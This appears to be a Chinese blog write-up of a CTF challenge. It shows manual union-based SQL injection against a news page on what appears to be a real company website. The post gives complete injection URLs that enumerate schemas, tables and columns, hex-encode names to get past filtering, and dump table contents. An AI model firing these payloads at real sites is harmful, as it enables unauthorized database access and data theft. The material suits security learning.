write up:web 实战2-注入--sql注入(手工注入详细版)

最新推荐文章于 2022-02-26 23:38:59 发布
最新推荐文章于 2022-02-26 23:38:59 发布
阅读量604 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tb_youth/article/details/103376038
版权

在这里插入图片描述

0x00查找注入点

我是通过展开html标签来找注入点的

在这里插入图片描述
注入点

www.kabelindo.co.id/readnews.php?id=28

下面开始盘它!!!

0x01 手动注入

在这里插入图片描述
先确定字段数目
先测试3,没有问题
在这里插入图片描述
再测试6,出错

在这里插入图片描述
再测试5,id=28时,不知道是不是我网的问题加载的很慢,我换成id=1进行测试,发现响应没有问题
在这里插入图片描述

这就确定了字段有5个
可以进一步验证:
在这里插入图片描述
查一下数据库名
在这里插入图片描述
查一下数据库版本
为了防止其他信息的干扰:id=-1
在这里插入图片描述MariaDB数据库管理系统是MySQL的一个分支,主要由开源社区在维护,采用GPL授权许可 MariaDB的目的是完全兼容MySQL,包括API和命令行,使之能轻松成为MySQL的代替品。在存储引擎方面,使用XtraDB(英语:XtraDB)来代替MySQL的InnoDB。–度娘

也可以查查用户
(多练习一下~)

在这里插入图片描述
先切入正题
爆出表名

http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database()

在这里插入图片描述
上面的就是表名
这里有一个问题,查出来的表名是乱序的
(我尝试了将现在查出来的表名的最后一个当flag提交并不正确!!)
在这里插入图片描述
这里表名不是很多,可以一个一个去试,但是这比较笨~。
我思考了一下,数据库中的表名是不是字典序呢?

先按表名(即这里的第二个字段)排序,交最后一个试试:

http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database()  order by 2

在这里插入图片描述

flag{tbnomax}
拿去提交提交,的确就是正确答案~
所以数据库中表名是按字典序排序的猜想貌似得到了验证啊~~
补充:学了数据库的都知道,order默认是升序(ASC),降序为(DESC)。

0x03在这题中多加练习

爆出所有数据库名

http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(schema_name),3,4,5  from information_schema.schemata

在这里插入图片描述
group_concat()
是将查询到的结果放到同一个组中

如果数据库名为敏感字段

直接用敏感字段查询不到结果,
可以将数据库名转换为16进制再查询。
(上面数据库名直接使用的database(),所以绕过了敏感字段检查)
‘u9897uwx_kabel’ = ‘0x75393839377577785f6b6162656c’

字符串转16进制的脚本

import binascii
s = 'u9897uwx_kabel' 
str_hex = binascii.b2a_hex(s.encode('utf-8'))
print(str_hex)
#之后加上0x前缀!!!

http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=0x75393839377577785f6b6162656c order by 2

在这里插入图片描述
和database()效果一样,具体原因有待研究。
单独查一下’informtion_schema’=‘0x696e666f726d74696f6e5f736368656d61’,

http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(table_name),user(),4 ,5 from information_schema.tables where table_schema=0x696e666f726d6174696f6e5f736368656d61

在这里插入图片描述
查询某张表中的字段
(这里表名也是敏感字段,同理进行16进制编码)
‘tbnomax’ = ‘0x74626e6f6d6178’

http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x74626e6f6d6178

在这里插入图片描述查找表中的具体内容

此时表名不是敏感字段了

http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(nokode,nogrp,nomax),3,4,5 from tbnomax

在这里插入图片描述

这篇 ----- 》 end~

Leo Bliss
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SWPU2019 Web1(无列名注入MariaDB)
weixin_52780973的博客
10-31 965
sql注入、无列名注入MariaDB
mysql in sql注入_mysql – MariaDb SQL注入
weixin_35972199的博客
01-27 1571
EDIT: This is being done on Hack The Box so no nasty illegal stuffgoing on.好吧,让我们玩得开心吧.当我看到错误消息DEBUG INFO: You have an error in your SQL syntax; check the manualthat corresponds to your MariaDB server...
手工检测SQL注入漏洞
weixin_30279751的博客
03-31 3407
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,具体来说,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句,下面我们将演示SQL注入的一些原理性的东西. 数字型注入 数字型注入是...
sql注入1之手工注入
这周末在做梦的博客
09-18 221
常见sql注入解题思路(题目来源ctfhub整数型注入) 关键字/语句/函数 解释 union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的本如:mysql 1.2.3,mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata
渗透攻防web篇-sql注入攻击中级
煮酒闲谈
08-05 4021
Preface 找到SQL注入漏洞后,我们可以用它来干什么呢?那么本篇文章给大家带来的就是SQL注入漏洞利用技术,现在是时候让我们去体验一下漏洞利用的乐趣了。 目录 第三节 利用SQL注入 3.1 识别数据库3.2 UINON语句提取数据3.3 枚举数据库3.4 窃取哈希可令3.5 获取WebShell 第四节 SQL盲注利用 4.1 初识SQL盲注4.2 SQL盲注入技术
CTF-Write-up:CTF撰写和信息
03-21
在CTF-Write-up-main这个压缩包中,可能包含了多个CTF Write-up文档,每个文档都详细记录了一个或多个挑战的解题过程。这些文档可以作为学习资料,帮助初学者了解不同类型的CTF挑战,熟悉解题流程,并且学习如何分析...
Mojolicious-Plugin-WriteExcel:Mojolicious-Plugin-WriteExcel 的只读发布历史记录
07-02
Mojolicious::Plugin::WriteExcel - 从 Mojolicious 编写 Excel 电子表格 概要 # Mojolicious $self->plugin('write_excel'); # Mojolicious::Lite plugin 'write_excel'; # Render a spreadsheet get '/example....
write-guard:对Monorepos实施文件级写访问
05-01
写保护对Monorepos实施文件级写访问用法Write-guard旨在对具有受保护的master分支的monorepos强制执行文件级写访问限制推送已启用启用状态后,需要状态检查才能通过。 :warning: 如果未强制执行这些操作,则写保护将...
PSWriteColor:Write-Color是Write-Host的包装,可让您使用彩色输出创建美观的脚本
05-15
Write-Color是Write-Host的包装,使您可以创建带有彩色输出的漂亮脚本。 变更日志 0.87.3-2021.04.12 :light_bulb: 禁用文件外出功能的WhatIf功能,这将阻止记录到文件 :light_bulb: 添加了LogRetry (2)以提供...
Skills Assessment - SQL Injection Fundamentals Write Up.pdf
最新发布
07-21
Hack The Box - SQL Injection Fundamentals Module详细讲解中文教程-实战训练解析
mysql手工注入环境_MYSQL手工注入方法和流程
weixin_30629043的博客
01-19 257
今天我们接着以sqli-labs实验环境的mysql数据库为例来讲解mysql数据库手工注入的方法和流程。mysql数据库是一个强大和使用广泛的数据库,它分为社区和商业,而且开放源码。这节课开始之前,先给大家介绍下mysql数据库的结构以及它强大的内置库。MYSQL数据库的结构以及内置库mysql数据库主要是由连接层、SQL层和存储引擎层组成的。其中连接层主要负责处理通讯协议、线程、身份数据验...
MySQL 手工注入语句总结
senlin1202的博客
03-04 7101
sunzn:存查备用! 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2225
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
BugkuCTF-web进阶-实战2-注入 writeup
会下雪的晴天
07-14 1455
题目描述 解题传送门:http://www.kabelindo.co.id/ 解题思路 打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始 注入嘛,老套路,两种方法 法一、手工注入 猜字段http://www.kabelindo.co....
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2701
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
一道简单的sql注入题目
weixin_44215027的博客
11-05 1943
一道简单的sql注入题目 好久都没有做ctf的题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
bugku-sql注入2 (附详细代码)
偷一个月亮
06-20 1940
构造select * from * where uname = $_POST[uname] uname=admin’-’ 此时uname=-1,不行 $sql = select * from users where username=$username; 在字符串username的值和数字0比较的时候,字符串变为了0 故此0=0 payload:admin’-(ascii(mid(R...
BugKu之sql注入
D-R0s1的博客
08-08 875
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
BugKuCTF中套路满满的题--------getshell
qq_42133828的博客
12-19 909
这道题目是一个关于文件上传的题目, 而他的绕过机制是黑名单检测和类型检测 黑名单检测:使用php5绕过,其他的(php3,phtml,php4.。。)都绕不过 类型检测:抓包,改参数filename:2.php5  ,有两个Content-Type,先改第二个的Content-Type:image/jpeg  ,再改第一个的Content-Type:Multipart/form-data; ...
SCTF2020官方Write-up:Web安全漏洞与修复案例分析
在SCTF2020官方Write-up中,参赛者们探讨了一道关于Web安全的挑战,涉及到了Node.js后端开发中的文件上传漏洞。题目提供的源码显示,一个名为`uploadfile`的路由处理POST请求中的文件上传,使用了Koa框架和`crypto`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leo Bliss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值